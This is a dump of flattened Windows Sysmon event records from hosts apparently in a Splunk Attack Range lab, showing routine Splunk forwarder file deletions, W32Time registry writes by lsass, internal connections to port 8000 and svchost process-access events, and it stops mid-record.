23542300x8000000000000000286647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:25.774{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEFC031D22CBF3562B067DD682E1A1A4,SHA256=032E14C323A095E9ED636EE2482B8A3F1082E3216227C14A46D428ADEB3D560F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:25.166{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4523A9026A328A01AD8A2F2A7901F3A,SHA256=DC0B6DB6ECC7183679FD31FBBFE65B09C4759BEC1C5B73B6742B9F4B655D4FB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:26.788{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77191E3FEB8E4AACAE5CA4099DE6166D,SHA256=9DCA4E81ED03BC3E9FF2110B051F56572E99201B697503048EFD978B475685B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:26.291{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60E0C09779B30CCE8A464E291277614,SHA256=EFFC9B3BA598E8B0D6672969A8360D73AA9DC0E93583CA245EA9A49C2B27CED7,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000286657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000286656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0078e893) 13241300x8000000000000000286655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d82899-0xf20735f9) 13241300x8000000000000000286654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a2-0x53cb9df9) 13241300x8000000000000000286653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828aa-0xb59005f9) 13241300x8000000000000000286652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000286651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0078e893) 13241300x8000000000000000286650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d82899-0xf20735f9) 13241300x8000000000000000286649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a2-0x53cb9df9) 13241300x8000000000000000286648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:26.648{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828aa-0xb59005f9) 354300x8000000000000000215524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:23.589{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51264-false10.0.1.12-8000- 23542300x8000000000000000286659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:27.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA7CBD35153F23E8FA4A74039CDB0DC0,SHA256=37B7E809697C95543DFB404F18B6D1EAF43B9E2707D1B8825BB5F82252847CCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:27.322{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=501AC1965303D04E3A830AACF947009D,SHA256=49BBDB9E71553BBC85110A6930B44CEF950694CF994F79CB9D856B096D77B8B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:28.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D69876E5136F8BA586CA631F4B3ED92,SHA256=BEBADAB4AF6296BF9F30555D1E75FE8D188BEB633A0A0B45B917F5EE5C3D9308,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:28.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE427EACA21A2379FFD301349AE340E8,SHA256=D57AB540B6020F6D76A9ADF3651F62728ACEF17915E6C2CDE11C997CA4005FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:29.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0341E3B3B7C290F8CEC2D0EE9E653D25,SHA256=E0C14460D7BB216A44508F372FE2123C82C977ED40757B9764ED61490483C219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:29.385{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94E10947DE16E65ADB8838A5B129A112,SHA256=AD2E93C4E384DD029B46395234722823FF5813EA7320DFA755049BC2C7DBF3FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:26.575{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53348-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:30.603{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E228252D091474E8176B5E3E2379709E,SHA256=8F7318E7B876768C3F47E62CB465F2D69FCA1179B2C66C5DBD96006245AB814E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:30.835{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21EC40E678E5BA1792EB5DAB1BA6A44,SHA256=0E93CDBE4D9D02CC6314701B30F4724BFF4774533376A2E8D5DE3F0664FC5E8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:30.260{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=45A9A0150B0187B6F55E8BDB4A20637E,SHA256=EF6C5FF5747404233D7F0673A99D024851D82C580A8DA0ADA6A9F9BC737BEB54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:31.666{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097B58B8F8AE733975096AEBC5F487D5,SHA256=28E36C26AF753358D329CC0EB076657A534AAE8DAF65CE49C4915CD761A0F190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:31.851{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC5EA92A1C9FCF3D771ECBA261E5230,SHA256=0F723CD0715541A1D97A453463AE565DC40C5C3932F120412DADD228EF10B145,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:28.605{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51265-false10.0.1.12-8000- 23542300x8000000000000000215536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:32.807{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D7991D17927000EBE77E283CDB98B7,SHA256=F41DA6255E973597038CA07C5F2CC001A43EA58B95E7F569D254DD27E56243F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:32.867{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A75D9DD621C0A053AE44B209ADFBC5B,SHA256=9B2617059D8AA7D428BBD6D58B9AB6EA778A815E4B676CB4AF8FB306F10A6DCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:32.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:32.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:32.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:33.882{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD91CDE2C93A687CA08FEC0F41EA4A4A,SHA256=C4D077FF9B0CFBB112BE0C33E0B2F304A609ECAE71ABD0255AC8C4520AD6F0A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:33.869{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929184289680E95FA191F0D96DA7CC04,SHA256=3AD84A3C3536CAFAC73E76A881293710D86BF4C7D834775DE049C98BC8021A22,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:31.684{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53349-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:33.320{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=465AD5053CD8BA017A1CF948AD5A4D06,SHA256=CADD2456885EC164A7075168CA915C35E33A3924106FA416A77E56EC1E66D078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:34.885{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A81241F30CD7FCBB23156F9A0FF41AF,SHA256=E2BDC680C330CF66D7EBF32B11BD6B10EC744674705F4702F8199DCEB39AA56A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:34.898{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41FCCBD9B0F357908BB6EBD26ED58A62,SHA256=FD2F69FC9408A7DEDA5351EC111D25A639A63B032ABFF748E2F4070635B9385B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:35.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B6A2F78910DE51B2E4C7D6784BF4EEB,SHA256=7E606A2C6BC0FEEE2C1CECB3A0771C7A099A4FAFB33DB604C327135F612813B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:35.913{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF1916640ED33602EAEE5CCF46C3CC94,SHA256=57B18144CB9198E49865784E5C81DB66CD344258DB6FBB23DCC6296249464C00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:36.916{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676B1EE38E60F33B0FB12F7D8FEA5DA4,SHA256=D6DC4A3936BFCFA1F1EF77BCFE286CCBFE18986ABBF78EEED2DD6246BE8845F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:36.914{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEFBF841B75AFD9007DF94F2F6107AD,SHA256=9C948B35A7008F4745B8E1B72A0FE930CD90C90BFFA0F1E1A0C9D7E74754EA8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:33.672{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51266-false10.0.1.12-8000- 23542300x8000000000000000286672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:37.929{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07892E2677772FF433A7111A76479D8,SHA256=E14033A3E38E1D5047CA4D54D1C026CBC027DFBE9EE5D921584F094C15ABF043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:37.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF94387844C9674856E6D0214E67935,SHA256=589EE060C2C4E2720744DC63B29CEA9E4B49375BB07E39139C751B11C33524D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:38.947{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E9233F26F2F19B29CBB436DB2D41E4F,SHA256=3AD91E069C9890AE5FD36457607FEF57080D964B813718E13AE05020DBFFFE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:38.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA903B04696C5B7E0918E3F98DE87ED7,SHA256=5C9F3F13CDF12D50344CF7AE9F6574A46A9CF9D35A4D5D12E2B1728222B058D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:39.963{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DFDD89C488273D226EB6E8957DF2984,SHA256=561F9F62D8A9D46F20D5023F9B389D419A1B2A936468021ADA8A241F312FFD36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:39.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=663CD8CB5C6200E0728EFDA47860180E,SHA256=1A0BC1D9B8D974916FEFC2DAB9199DD6DD57E247E151C359396AAB4B5C255064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:39.663{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:40.978{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 